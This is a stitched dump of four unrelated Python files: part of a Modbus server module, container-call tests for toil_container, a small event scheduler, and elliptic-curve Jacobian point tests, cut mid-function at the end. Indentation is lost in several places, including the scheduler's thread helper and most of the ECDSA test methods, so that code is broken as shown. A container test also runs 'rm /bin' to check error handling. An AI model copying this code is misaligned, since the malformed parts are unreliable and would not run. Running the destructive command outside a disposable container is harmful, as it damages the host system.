            for i in range(len(self._memory[block_type])):
                block = self._memory[block_type][i]
                if block.is_in(starting_address, size):
                    raise OverlapModbusBlockError(
                        "Overlap block at {0} size {1}".format(block.starting_address, block.size)
                    )
                if block.starting_address > starting_address:
                    index = i
                    break
            # NOTE(review): when the new block's address is greater than every
            # existing one, index stays 0 and the block is inserted at the
            # front; lookups scan all blocks so ordering does not affect
            # correctness -- TODO confirm nothing relies on sorted order.
            # if the block is ok: register it
            self._blocks[block_name] = (block_type, starting_address)
            # add it in the 'per type' shortcut
            self._memory[block_type].insert(index, ModbusBlock(starting_address, size, block_name))
    def remove_block(self, block_name):
        """
        Remove the block with the given name.
        Raise an exception if not found
        """
        # thread safe
        with self._data_lock:
            block = self._get_block(block_name)
            # the block has been found: remove it from the shortcut
            block_type = self._blocks.pop(block_name)[0]
            self._memory[block_type].remove(block)
    def remove_all_blocks(self):
        """
        Remove all the blocks
        """
        # thread safe
        with self._data_lock:
            self._blocks.clear()
            for key in self._memory:
                self._memory[key] = []
    def _get_block(self, block_name):
        """Find a block by its name and raise and exception if not found"""
        if block_name not in self._blocks:
            raise MissingKeyError("block {0} not found".format(block_name))
        (block_type, starting_address) = self._blocks[block_name]
        for block in self._memory[block_type]:
            if block.starting_address == starting_address:
                return block
        raise Exception("Bug?: the block {0} is not registered properly in memory".format(block_name))
    def set_values(self, block_name, address, values):
        """
        Set the values of the items at the given address
        If values is a list or a tuple, the value of every item is written
        If values is a number, only one value is written
        """
        # thread safe
        with self._data_lock:
            block = self._get_block(block_name)
            # the block has been found
            # check that it doesn't write out of the block
            offset = address-block.starting_address
            size = 1
            if isinstance(values, list) or isinstance(values, tuple):
                size = len(values)
            if (offset < 0) or ((offset + size) > block.size):
                raise OutOfModbusBlockError(
                    "address {0} size {1} is out of block {2}".format(address, size, block_name)
                )
            # if Ok: write the values
            if isinstance(values, list) or isinstance(values, tuple):
                block[offset:offset+len(values)] = values
            else:
                block[offset] = values
    def get_values(self, block_name, address, size=1):
        """
        return the values of n items at the given address of the given block
        """
        # thread safe
        with self._data_lock:
            block = self._get_block(block_name)
            # the block has been found
            # check that it doesn't read out of the block
            offset = address - block.starting_address
            if (offset < 0) or ((offset + size) > block.size):
                raise OutOfModbusBlockError(
                    "address {0} size {1} is out of block {2}".format(address, size, block_name)
                )
            # returns the values
            if size == 1:
                return tuple([block[offset], ])
            else:
                return tuple(block[offset:offset+size])
class Databank(object):
    """A databank is a shared place containing the data of all slaves.

    Access to the slave map is serialized with an RLock so slaves can be
    added/removed while requests are being dispatched.
    """
    def __init__(self, error_on_missing_slave=True):
        """Constructor

        :param error_on_missing_slave: when True, a request addressed to an
            unknown slave raises MissingKeyError; when False it is silently
            ignored (no response is sent).
        """
        # the map of slaves by ids
        self._slaves = {}
        # protect access to the map of slaves
        self._lock = threading.RLock()
        self.error_on_missing_slave = error_on_missing_slave
    def add_slave(self, slave_id, unsigned=True, memory=None):
        """Add a new slave with the given id (1..255) and return it.

        Raises DuplicatedKeyError if the id is already registered.
        """
        with self._lock:
            if (slave_id <= 0) or (slave_id > 255):
                raise Exception("Invalid slave id {0}".format(slave_id))
            if slave_id not in self._slaves:
                self._slaves[slave_id] = Slave(slave_id, unsigned, memory)
                return self._slaves[slave_id]
            else:
                raise DuplicatedKeyError("Slave {0} already exists".format(slave_id))
    def get_slave(self, slave_id):
        """Get the slave with the given id; raise MissingKeyError if absent."""
        with self._lock:
            if slave_id in self._slaves:
                return self._slaves[slave_id]
            else:
                raise MissingKeyError("Slave {0} doesn't exist".format(slave_id))
    def remove_slave(self, slave_id):
        """Remove the slave with the given id; raise MissingKeyError if absent."""
        with self._lock:
            if slave_id in self._slaves:
                self._slaves.pop(slave_id)
            else:
                # bug fix: the message previously said "already exists",
                # copy-pasted from add_slave; a missing slave doesn't exist.
                raise MissingKeyError("Slave {0} doesn't exist".format(slave_id))
    def remove_all_slaves(self):
        """clean the list of slaves"""
        with self._lock:
            self._slaves.clear()
    def handle_request(self, query, request):
        """
        when a request is received, handle it and returns the response pdu

        Returns "" (empty response) on invalid requests or unknown slaves,
        None for broadcasts, and a server-failure error pdu on unexpected
        exceptions.
        """
        request_pdu = ""
        try:
            # extract the pdu and the slave id
            (slave_id, request_pdu) = query.parse_request(request)
            # get the slave and let him executes the action
            if slave_id == 0:
                # broadcast to every slave; no response is sent back
                # NOTE(review): this iteration is not protected by self._lock
                # -- a concurrent add/remove_slave could mutate the dict
                # mid-iteration; TODO confirm whether that matters here.
                for key in self._slaves:
                    self._slaves[key].handle_request(request_pdu, broadcast=True)
                return
            else:
                try:
                    slave = self.get_slave(slave_id)
                except MissingKeyError:
                    if self.error_on_missing_slave:
                        raise
                    else:
                        return ""
                response_pdu = slave.handle_request(request_pdu)
                # make the full response
                response = query.build_response(response_pdu)
                return response
        except ModbusInvalidRequestError as excpt:
            # Request is invalid, do not send any response
            LOGGER.error("invalid request: " + str(excpt))
            return ""
        except MissingKeyError as excpt:
            # No slave with this ID in server, do not send any response
            LOGGER.error("handle request failed: " + str(excpt))
            return ""
        except Exception as excpt:
            call_hooks("modbus.Databank.on_error", (self, excpt, request_pdu))
            LOGGER.error("handle request failed: " + str(excpt))
            # If the request was not handled correctly, return a server error response
            func_code = 1
            if len(request_pdu) > 0:
                (func_code, ) = struct.unpack(">B", request_pdu[0:1])
            return struct.pack(">BB", func_code + 0x80, defines.SLAVE_DEVICE_FAILURE)
class Server(object):
    """
    This class owns several slaves and defines an interface
    to be implemented for a TCP or RTU server.  Subclasses override
    _do_init/_do_run/_do_exit/_make_query; the run loop executes on a
    dedicated thread controlled by a threading.Event.
    """
    def __init__(self, databank=None):
        """Constructor

        :param databank: shared Databank instance; a fresh one is created
            when omitted.
        """
        # never use a mutable type as default argument
        self._databank = databank if databank else Databank()
        self._verbose = False
        self._thread = None
        self._go = None
        self._make_thread()
    def _do_init(self):
        """executed before the server starts: to be overridden"""
        pass
    def _do_exit(self):
        """executed after the server stops: to be overridden"""
        pass
    def _do_run(self):
        """main function of the server: to be overridden"""
        pass
    def _make_thread(self):
        """create the main thread of the server and its stop event"""
        self._thread = threading.Thread(target=Server._run_server, args=(self,))
        self._go = threading.Event()
    def set_verbose(self, verbose):
        """if verbose is true the sent and received packets will be logged"""
        self._verbose = verbose
    def get_db(self):
        """returns the databank"""
        return self._databank
    def add_slave(self, slave_id, unsigned=True, memory=None):
        """add slave to the server"""
        return self._databank.add_slave(slave_id, unsigned, memory)
    def get_slave(self, slave_id):
        """get the slave with the given id"""
        return self._databank.get_slave(slave_id)
    def remove_slave(self, slave_id):
        """remove the slave with the given id"""
        self._databank.remove_slave(slave_id)
    def remove_all_slaves(self):
        """remove all the slaves"""
        self._databank.remove_all_slaves()
    def _make_query(self):
        """
        Returns an instance of a Query subclass implementing
        the MAC layer protocol
        """
        raise NotImplementedError()
    def start(self):
        """Start the server. It will handle request"""
        self._go.set()
        self._thread.start()
    def stop(self):
        """stop the server. It doesn't handle request anymore"""
        if self._thread.is_alive():
            self._go.clear()
            self._thread.join()
    def _run_server(self):
        """main function of the main thread"""
        try:
            self._do_init()
            # is_set() replaces the deprecated isSet() alias, consistent
            # with the modern is_alive() spelling already used in stop()
            while self._go.is_set():
                self._do_run()
            LOGGER.debug("%s has stopped", self.__class__)
            self._do_exit()
        except Exception as excpt:
            LOGGER.error("server error: %s", str(excpt))
        # make possible to rerun in future
        self._make_thread()
    def _handle(self, request):
        """handle a received sentence"""
        if self._verbose:
            LOGGER.debug(get_log_buffer("-->", request))
        # gets a query for analyzing the request
        query = self._make_query()
        # hooks may rewrite the request and the response
        retval = call_hooks("modbus.Server.before_handle_request", (self, request))
        if retval:
            request = retval
        response = self._databank.handle_request(query, request)
        retval = call_hooks("modbus.Server.after_handle_request", (self, response))
        if retval:
            response = retval
        if response and self._verbose:
            LOGGER.debug(get_log_buffer("<--", response))
        return response
|
test_containers.py | """toil_container containers tests."""
from multiprocessing import Process
from os.path import join
import getpass
import os
import docker
import pytest
from toil_container import __version__
from toil_container import exceptions
from toil_container.containers import _TMP_PREFIX
from toil_container.containers import _remove_docker_container
from toil_container.containers import docker_call
from toil_container.containers import singularity_call
from .utils import DOCKER_IMAGE
from .utils import ROOT
from .utils import SINGULARITY_IMAGE
from .utils import SKIP_DOCKER
from .utils import SKIP_SINGULARITY
from .utils import Capturing
def assert_option_check_output(call, img):
    """Shared check: check_output=True returns stdout; failing calls raise."""
    # test check_output True
    listing = call(img, args=["ls", "/"], check_output=True)
    assert "bin" in listing
    # test toil_container.ContainerError is raised with bad command
    with pytest.raises(exceptions.ContainerError) as error:
        call(img, args=["rm", "/bin"])
    assert "raised during the container system call" in str(error.value)
def assert_option_cwd(call, img):
    """Shared check: the cwd option sets the working directory in the container."""
    listing = call(img, ["ls", ".."], cwd="/bin", check_output=True)
    assert "bin" in listing
def assert_option_env(call, img):
    """Shared check: env vars must be passed explicitly; the host
    environment is not inherited by the container.

    Fix: the original left FOO=BAR in os.environ for the rest of the test
    session, leaking state into later tests; the previous value is now
    restored.
    """
    args = ["bash", "-c", "echo $FOO"]
    assert "BAR" in call(img, args, env={"FOO": "BAR"}, check_output=True)
    # check container doesn't inherit environment
    previous = os.environ.get("FOO")
    os.environ["FOO"] = "BAR"
    try:
        assert "BAR" not in call(img, args, check_output=True)
    finally:
        if previous is None:
            del os.environ["FOO"]
        else:
            os.environ["FOO"] = previous
def assert_parallel_call(call, img):
    """Shared check: two container calls can run concurrently.

    Fix: the original wrapped `call` in lambdas, which cannot be pickled
    under the 'spawn' start method (the default on macOS and Windows);
    pass the callable and its arguments to Process directly instead.
    """
    first = Process(target=call, args=(img, ["sleep", "1"]))
    second = Process(target=call, args=(img, ["sleep", "1"]))
    first.start()
    second.start()
    first.join()
    second.join()
def assert_option_volumes(call, img, tmpdir):
    """Shared check: host directories can be mounted into the container."""
    host_dir = tmpdir.strpath
    host_file = tmpdir.join("foo")
    container_dir = join(os.sep, "SHARED")
    container_file = join(container_dir, "foo")
    command = ["bash", "-c", "echo bar > " + container_file]
    call(img, command, volumes=[(host_dir, container_dir)])
    assert "bar" in host_file.read()
def assert_option_working_dir(call, img, tmpdir):
    """Assert ``working_dir`` placement and the ``remove_tmp_dir`` flag."""
    args = ["bash", "-c", "echo bar > /tmp/foo"]

    # remove_tmp_dir=False: the scratch directory (and /tmp content) is kept.
    kept = tmpdir.mkdir("dont")
    call(img, args, working_dir=kept.strpath, remove_tmp_dir=False)
    produced = next(kept.visit(_TMP_PREFIX + "*/foo"))
    assert "bar" in produced.read()

    # remove_tmp_dir=True: the scratch directory must be gone afterwards.
    removed = tmpdir.mkdir("remove")
    call(img, args, working_dir=removed.strpath, remove_tmp_dir=True)
    assert not list(removed.visit(_TMP_PREFIX + "*"))
@SKIP_DOCKER
def test_docker_check_output_false_prints_to_stdout_and_stderr():
    """With check_output left False, output is printed and the status returned."""
    with Capturing() as output:
        exit_status = docker_call(DOCKER_IMAGE, args=["ls", "/"])
    assert exit_status == 0
    assert "bin" in " ".join(output)  # check stdout and stderr are printed
@SKIP_DOCKER
def test_docker_check_output():
    """Run the shared check_output assertions against docker_call."""
    assert_option_check_output(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_cwd():
    """Run the shared cwd assertions against docker_call."""
    assert_option_cwd(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_env():
    """Run the shared env assertions against docker_call."""
    assert_option_env(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_parallel():
    """Run the shared parallel-execution assertions against docker_call."""
    assert_parallel_call(docker_call, DOCKER_IMAGE)
@SKIP_DOCKER
def test_docker_volumes(tmpdir):
    """Run the shared volume-mount assertions against docker_call."""
    assert_option_volumes(docker_call, DOCKER_IMAGE, tmpdir)
@SKIP_DOCKER
def test_docker_working_dir(tmpdir):
    """Run the shared working_dir assertions against docker_call."""
    assert_option_working_dir(docker_call, DOCKER_IMAGE, tmpdir)
@SKIP_SINGULARITY
def test_singularity_check_output():
    """Run the shared check_output assertions against singularity_call."""
    assert_option_check_output(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_cwd():
    """Run the shared cwd assertions against singularity_call."""
    assert_option_cwd(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_env():
    """Run the shared env assertions against singularity_call."""
    assert_option_env(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_parallel():
    """Run the shared parallel-execution assertions against singularity_call."""
    assert_parallel_call(singularity_call, SINGULARITY_IMAGE)
@SKIP_SINGULARITY
def test_singularity_volumes(tmpdir):
    """Run the shared volume-mount assertions against singularity_call."""
    assert_option_volumes(singularity_call, SINGULARITY_IMAGE, tmpdir)
@SKIP_SINGULARITY
def test_singularity_working_dir(tmpdir):
    """Run the shared working_dir assertions against singularity_call."""
    assert_option_working_dir(singularity_call, SINGULARITY_IMAGE, tmpdir)
@SKIP_SINGULARITY
def test_singularity_doesnt_overwrite_home():
    """The container's /home must not gain the host user's home directory."""
    args = ["bash", "-c", "ls /home"]
    # Entries under .singularity/docker are created by singularity itself
    # and are not evidence of a leaked host home; filter them out.
    skip = ".singularity/docker"
    output = singularity_call(SINGULARITY_IMAGE, args, check_output=True)
    output = "".join(i for i in output.split() if skip not in i)
    assert getpass.getuser() not in output
@SKIP_DOCKER
def test_remove_docker_container():
    """_remove_docker_container deletes a running container by its name."""
    name = "florentino-ariza"
    client = docker.from_env(version="auto")
    container = client.containers.create(DOCKER_IMAGE, ["ls"], name=name)
    container.start()
    _remove_docker_container(name)
    # After removal, looking the container up by name must fail.
    with pytest.raises(docker.errors.NotFound) as error:
        client.containers.get(name)
    assert name in str(error.value)
@SKIP_DOCKER
def test_docker_container():
    """An image built from the repo root can import and report the version."""
    python_args = "from toil_container import __version__; print(__version__)"
    args = ["python", "-c", python_args]
    image_tag = "test-toil-container-image"
    client = docker.from_env(version="auto")
    # Build the image from the repository root (ROOT) before calling it.
    client.images.build(path=ROOT, rm=True, tag=image_tag)
    assert __version__ in docker_call(image_tag, args, check_output=True)
|
scheduler.py | import datetime
import schedule
import time
import threading
class Interval:
    """Supported scheduling interval kinds."""

    daily = "daily"
    workdays = "workdays"
    weekday = "weekday"

    @staticmethod
    def list():
        """Return every supported interval name."""
        return [Interval.daily, Interval.workdays, Interval.weekday]
class Day:
    """Week-day names accepted as interval arguments."""

    Sunday = "Sunday"
    Monday = "Monday"
    Tuesday = "Tuesday"
    Wednesday = "Wednesday"
    Thursday = "Thursday"
    Friday = "Friday"
    Saturday = "Saturday"

    @staticmethod
    def list():
        """Return all seven day names, starting with Sunday."""
        return [Day.Sunday, Day.Monday, Day.Tuesday, Day.Wednesday,
                Day.Thursday, Day.Friday, Day.Saturday]

    @staticmethod
    def workDays():
        """Return Monday through Friday."""
        return [Day.Monday, Day.Tuesday, Day.Wednesday,
                Day.Thursday, Day.Friday]
# Maps each interval kind to the valid ``interval_arg`` values for it;
# an empty list means the interval takes no argument at all.
_intervals = {
    Interval.daily: [],
    Interval.workdays: [],
    Interval.weekday: Day.list()
}
class ScheduleInitException(Exception):
    """Raised when a Schedule is built from invalid arguments."""


TIME_FMT = "%H:%M:%S"


class Schedule:
    """Schedule time, interval and interval argument if needed."""

    def __init__(self, time: datetime.time, interval: str, interval_arg=None):
        allowed_args = _intervals[interval]
        if allowed_args:
            # This interval requires one of the listed arguments.
            if interval_arg not in allowed_args:
                raise ScheduleInitException("Incorrect interval argument.")
        elif interval_arg:
            # This interval accepts no argument at all.
            raise ScheduleInitException("Incorrect interval argument.")
        if not isinstance(time, datetime.time):
            raise ScheduleInitException("Time must be datetime.time")
        self.time = time
        self.interval = interval
        self.interval_arg = interval_arg

    def time_str(self, fmt=TIME_FMT):
        """Return the schedule time formatted with *fmt*."""
        return self.time.strftime(fmt)

    def json(self):
        """Return a JSON-serializable dict representation."""
        data = dict(self.__dict__)
        data["time"] = self.time_str()
        return data
class Event:
    """A named occurrence bound to a Schedule."""

    def __init__(self, name, schedule):
        self.name = name
        self.schedule = schedule
def _schedule_run_pending(_schedule):
    # Blocking poll loop: run any due jobs once per second, forever.
    # Meant to run on a daemon thread (started by Scheduler), so it dies
    # with the process.
    while True:
        _schedule.run_pending()
        time.sleep(1)
def _run_event_non_blocking(runner, arg, name):
t = threading.Thread(group=None, target=runner, args=(arg, name),
daemon=True)
t.start()
def _scheduler_runner(*args):
    """Job callback adapter for the ``schedule`` library.

    The single positional argument is the ``(scheduler, event)`` pair
    packed by ``Scheduler.schedule_event``; unpack it and fire the
    event's runner without blocking the polling thread.
    """
    sched_obj, event = args[0]
    _run_event_non_blocking(
        sched_obj.job_runner, sched_obj.job_runner_arg, event.name
    )
class Scheduler:
    """Dispatch Events at their scheduled times from a background thread.

    ``runner(runner_arg, event_name)`` is executed on its own daemon
    thread each time a registered event fires.
    """
    def __init__(self, runner, runner_arg):
        self.jobs = {} # {name: [job,]}
        self.job_runner = runner
        self.job_runner_arg = runner_arg
        # Private schedule.Scheduler, polled once a second by a daemon thread.
        self._s = schedule.Scheduler()
        self._run_scheduler_non_blocking()
    def __del__(self):
        # NOTE(review): cleanup via __del__ is best-effort — it may never
        # run; it only clears pending jobs, the polling thread is a daemon.
        self._s.clear()
    def _run_scheduler_non_blocking(self):
        # Start the run_pending() polling loop without blocking the caller.
        self._t = threading.Thread(group=None, target=_schedule_run_pending,
                                   args=(self._s,), daemon=True)
        self._t.start()
    def _add_job(self, name, job):
        # Group jobs under one event name (workdays registers several).
        if name in self.jobs:
            self.jobs[name].append(job)
        else:
            self.jobs.update({name: [job]})
    def schedule_event(self, event: Event):
        """Register *event* with the underlying ``schedule`` scheduler."""
        t = event.schedule.time_str()
        if event.schedule.interval == Interval.daily:
            j = self._s.every().day.at(t).do(_scheduler_runner, (self, event))
            self._add_job(event.name, j)
        elif event.schedule.interval == Interval.weekday:
            # interval_arg holds a Day name, e.g. "Monday" — the schedule
            # library exposes lowercase day attributes on every().
            weekday = event.schedule.interval_arg.lower()
            sched_day = getattr(self._s.every(), weekday)
            j = sched_day.at(t).do(_scheduler_runner, (self, event))
            self._add_job(event.name, j)
        elif event.schedule.interval == Interval.workdays:
            # One job per work day, all filed under the same event name.
            for day in Day.workDays():
                sched_day = getattr(self._s.every(), day.lower())
                j = sched_day.at(t).do(_scheduler_runner, (self, event))
                self._add_job(event.name, j)
    def cancel_events(self, name):
        """Cancel and forget every job registered under *name* (no-op if none)."""
        if jobs := self.jobs.get(name):
            for j in jobs:
                self._s.cancel_job(j)
            del self.jobs[name]
    def next_run(self):
        # Presumably the datetime of the next pending job (schedule API
        # property) — verify against the installed schedule version.
        return self._s.next_run
test_jacobi.py | import pickle
try:
import unittest2 as unittest
except ImportError:
import unittest
import os
import sys
import signal
import pytest
import threading
import platform
import hypothesis.strategies as st
from hypothesis import given, assume, settings, example
from .ellipticcurve import CurveFp, PointJacobi, INFINITY
from .ecdsa import (
generator_256,
curve_256,
generator_224,
generator_brainpoolp160r1,
curve_brainpoolp160r1,
generator_112r2,
)
from .numbertheory import inverse_mod
from .util import randrange
# Extra hypothesis @settings kwargs: the ``deadline`` option is only
# applied on Python newer than 2.7, where modern hypothesis supports it.
NO_OLD_SETTINGS = {}
if sys.version_info > (2, 7):  # pragma: no branch
    NO_OLD_SETTINGS["deadline"] = 5000
class TestJacobi(unittest.TestCase):
    def test___init__(self):
        """PointJacobi stores curve, coordinates and order as given."""
        # The curve is held by reference, so any object works here.
        curve = object()
        x = 2
        y = 3
        z = 1
        order = 4
        pj = PointJacobi(curve, x, y, z, order)
        self.assertEqual(pj.order(), order)
        self.assertIs(pj.curve(), curve)
        self.assertEqual(pj.x(), x)
        self.assertEqual(pj.y(), y)
    def test_add_with_different_curves(self):
        """Adding points that live on different curves must raise ValueError."""
        p_a = PointJacobi.from_affine(generator_256)
        p_b = PointJacobi.from_affine(generator_224)
        with self.assertRaises(ValueError):
            p_a + p_b

    def test_compare_different_curves(self):
        """Generators of different curves compare unequal."""
        self.assertNotEqual(generator_256, generator_224)

    def test_equality_with_non_point(self):
        """A point never compares equal to a non-point object."""
        pj = PointJacobi.from_affine(generator_256)
        self.assertNotEqual(pj, "value")

    def test_conversion(self):
        """Jacobian -> affine round-trip preserves the point."""
        pj = PointJacobi.from_affine(generator_256)
        pw = pj.to_affine()
        self.assertEqual(generator_256, pw)
def test_single_double(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256.double()
pj = pj.double()
self.assertEqual(pj.x(), pw.x())
self.assertEqual(pj.y(), pw.y())
def test_double_with_zero_point(self):
pj = PointJacobi(curve_256, 0, 0, 1)
pj = pj.double()
self.assertIs(pj, INFINITY)
def test_double_with_zero_equivalent_point(self):
pj = PointJacobi(curve_256, 0, curve_256.p(), 1)
pj = pj.double()
self.assertIs(pj, INFINITY)
def test_double_with_zero_equivalent_point_non_1_z(self):
pj = PointJacobi(curve_256, 0, curve_256.p(), 2)
pj = pj.double()
self.assertIs(pj, INFINITY)
def test_compare_with_affine_point(self):
pj = PointJacobi.from_affine(generator_256)
pa = pj.to_affine()
self.assertEqual(pj, pa)
self.assertEqual(pa, pj)
def test_to_affine_with_zero_point(self):
pj = PointJacobi(curve_256, 0, 0, 1)
pa = pj.to_affine()
self.assertIs(pa, INFINITY)
def test_add_with_affine_point(self):
pj = PointJacobi.from_affine(generator_256)
pa = pj.to_affine()
s = pj + pa
self.assertEqual(s, pj.double())
def test_radd_with_affine_point(self):
pj = PointJacobi.from_affine(generator_256)
pa = pj.to_affine()
s = pa + pj
self.assertEqual(s, pj.double())
def test_add_with_infinity(self):
pj = PointJacobi.from_affine(generator_256)
s = pj + INFINITY
self.assertEqual(s, pj)
def test_add_zero_point_to_affine(self):
pa = PointJacobi.from_affine(generator_256).to_affine()
pj = PointJacobi(curve_256, 0, 0, 1)
s = pj + pa
self.assertIs(s, pa)
def test_multiply_by_zero(self):
pj = PointJacobi.from_affine(generator_256)
pj = pj * 0
self.assertIs(pj, INFINITY)
def test_zero_point_multiply_by_one(self):
pj = PointJacobi(curve_256, 0, 0, 1)
pj = pj * 1
self.assertIs(pj, INFINITY)
def test_multiply_by_one(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256 * 1
pj = pj * 1
self.assertEqual(pj.x(), pw.x())
self.assertEqual(pj.y(), pw.y())
def test_multiply_by_two(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256 * 2
pj = pj * 2
self.assertEqual(pj.x(), pw.x())
self.assertEqual(pj.y(), pw.y())
def test_rmul_by_two(self):
pj = PointJacobi.from_affine(generator_256)
pw = generator_256 * 2
pj = 2 * pj
self.assertEqual(pj, pw)
def test_compare_non_zero_with_infinity(self):
pj = PointJacobi.from_affine(generator_256)
self.assertNotEqual(pj, INFINITY)
def test_compare_zero_point_with_infinity(self):
pj = PointJacobi(curve_256, 0, 0, 1)
self.assertEqual(pj, INFINITY)
def test_compare_double_with_multiply(self):
pj = PointJacobi.from_affine(generator_256)
dbl = pj.double()
mlpl = pj * 2
self.assertEqual(dbl, mlpl)
@settings(max_examples=10)
@given(
st.integers(
min_value=0, max_value=int(generator_brainpoolp160r1.order())
)
)
def test_multiplications(self, mul):
pj = PointJacobi.from_affine(generator_brainpoolp160r1)
pw = pj.to_affine() * mul
pj = pj * mul
self.assertEqual((pj.x(), pj.y()), (pw.x(), pw.y()))
self.assertEqual(pj, pw)
@settings(max_examples=10)
@given(
st.integers(
min_value=0, max_value=int(generator_brainpoolp160r1.order())
)
)
@example(0)
@example(int(generator_brainpoolp160r1.order()))
def test_precompute(self, mul):
precomp = generator_brainpoolp160r1
self.assertTrue(precomp._PointJacobi__precompute)
pj = PointJacobi.from_affine(generator_brainpoolp160r1)
a = precomp * mul
b = pj * mul
self.assertEqual(a, b)
@settings(max_examples=10)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
)
@example(3, 3)
def test_add_scaled_points(self, a_mul, b_mul):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
@settings(max_examples=10)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(min_value=1, max_value=int(curve_brainpoolp160r1.p() - 1)),
)
def test_add_one_scaled_point(self, a_mul, b_mul, new_z):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
p = curve_brainpoolp160r1.p()
assume(inverse_mod(new_z, p))
new_zz = new_z * new_z % p
b = PointJacobi(
curve_brainpoolp160r1,
b.x() * new_zz % p,
b.y() * new_zz * new_z % p,
new_z,
)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
@settings(max_examples=10)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(min_value=1, max_value=int(curve_brainpoolp160r1.p() - 1)),
)
@example(1, 1, 1)
@example(3, 3, 3)
@example(2, int(generator_brainpoolp160r1.order() - 2), 1)
@example(2, int(generator_brainpoolp160r1.order() - 2), 3)
def test_add_same_scale_points(self, a_mul, b_mul, new_z):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
p = curve_brainpoolp160r1.p()
assume(inverse_mod(new_z, p))
new_zz = new_z * new_z % p
a = PointJacobi(
curve_brainpoolp160r1,
a.x() * new_zz % p,
a.y() * new_zz * new_z % p,
new_z,
)
b = PointJacobi(
curve_brainpoolp160r1,
b.x() * new_zz % p,
b.y() * new_zz * new_z % p,
new_z,
)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
def test_add_same_scale_points_static(self):
j_g = generator_brainpoolp160r1
p = curve_brainpoolp160r1.p()
a = j_g * 11
a.scale()
z1 = 13
x = PointJacobi(
curve_brainpoolp160r1,
a.x() * z1 ** 2 % p,
a.y() * z1 ** 3 % p,
z1,
)
y = PointJacobi(
curve_brainpoolp160r1,
a.x() * z1 ** 2 % p,
a.y() * z1 ** 3 % p,
z1,
)
c = a + a
self.assertEqual(c, x + y)
@settings(max_examples=14)
@given(
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.integers(
min_value=1, max_value=int(generator_brainpoolp160r1.order())
),
st.lists(
st.integers(
min_value=1, max_value=int(curve_brainpoolp160r1.p() - 1)
),
min_size=2,
max_size=2,
unique=True,
),
)
@example(2, 2, [2, 1])
@example(2, 2, [2, 3])
@example(2, int(generator_brainpoolp160r1.order() - 2), [2, 3])
@example(2, int(generator_brainpoolp160r1.order() - 2), [2, 1])
def test_add_different_scale_points(self, a_mul, b_mul, new_z):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1)
a = PointJacobi.from_affine(j_g * a_mul)
b = PointJacobi.from_affine(j_g * b_mul)
p = curve_brainpoolp160r1.p()
assume(inverse_mod(new_z[0], p))
assume(inverse_mod(new_z[1], p))
new_zz0 = new_z[0] * new_z[0] % p
new_zz1 = new_z[1] * new_z[1] % p
a = PointJacobi(
curve_brainpoolp160r1,
a.x() * new_zz0 % p,
a.y() * new_zz0 * new_z[0] % p,
new_z[0],
)
b = PointJacobi(
curve_brainpoolp160r1,
b.x() * new_zz1 % p,
b.y() * new_zz1 * new_z[1] % p,
new_z[1],
)
c = a + b
self.assertEqual(c, j_g * (a_mul + b_mul))
def test_add_different_scale_points_static(self):
j_g = generator_brainpoolp160r1
p = curve_brainpoolp160r1.p()
a = j_g * 11
a.scale()
z1 = 13
x = PointJacobi(
curve_brainpoolp160r1,
a.x() * z1 ** 2 % p,
a.y() * z1 ** 3 % p,
z1,
)
z2 = 29
y = PointJacobi(
curve_brainpoolp160r1,
a.x() * z2 ** 2 % p,
a.y() * z2 ** 3 % p,
z2,
)
c = a + a
self.assertEqual(c, x + y)
def test_add_point_3_times(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertEqual(j_g * 3, j_g + j_g + j_g)
def test_mul_without_order(self):
j_g = PointJacobi(curve_256, generator_256.x(), generator_256.y(), 1)
self.assertEqual(j_g * generator_256.order(), INFINITY)
def test_mul_add_inf(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertEqual(j_g, j_g.mul_add(1, INFINITY, 1))
def test_mul_add_same(self):
j_g = PointJacobi.from_affine(generator_256)
self.assertEqual(j_g * 2, j_g.mul_add(1, j_g, 1))
def test_mul_add_precompute(self):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1, True)
b = PointJacobi.from_affine(j_g * 255, True)
self.assertEqual(j_g * 256, j_g + b)
self.assertEqual(j_g * (5 + 255 * 7), j_g * 5 + b * 7)
self.assertEqual(j_g * (5 + 255 * 7), j_g.mul_add(5, b, 7))
def test_mul_add_precompute_large(self):
j_g = PointJacobi.from_affine(generator_brainpoolp160r1, True)
b = PointJacobi.from_affine(j_g * 255, True)
self.assertEqual(j_g * 256, j_g + b)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g * 0xFF00 + b * 0xF0F0
)
self.assertEqual(
j_g * (0xFF00 + 255 * 0xF0F0), j_g.mul_add(0xFF00, b, 0xF0F0)
)
def test_mul_add_to_mul(self):
j_g = PointJacobi.from_affine(generator_256)
a = j_g * 3
b = j_g.mul_add(2, j_g, 1)
self.assertEqual(a, b)
def test_mul_add_differnt(self):
